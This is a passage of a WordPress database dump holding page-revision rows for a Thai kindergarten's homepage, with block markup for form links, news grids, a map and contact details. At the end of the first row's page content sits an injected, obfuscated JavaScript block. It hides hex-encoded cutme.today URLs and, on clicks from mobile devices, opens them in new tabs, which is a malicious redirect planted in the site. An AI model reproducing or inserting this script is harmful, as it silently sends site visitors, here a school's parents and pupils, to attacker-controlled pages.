{\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 10:29:10','2024-08-29 03:29:10','',19,'http://watprato.ssk.in.th/?p=255',0,'revision','',0),
(257,2,'2024-08-29 10:35:55','2024-08-29 03:35:55','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} 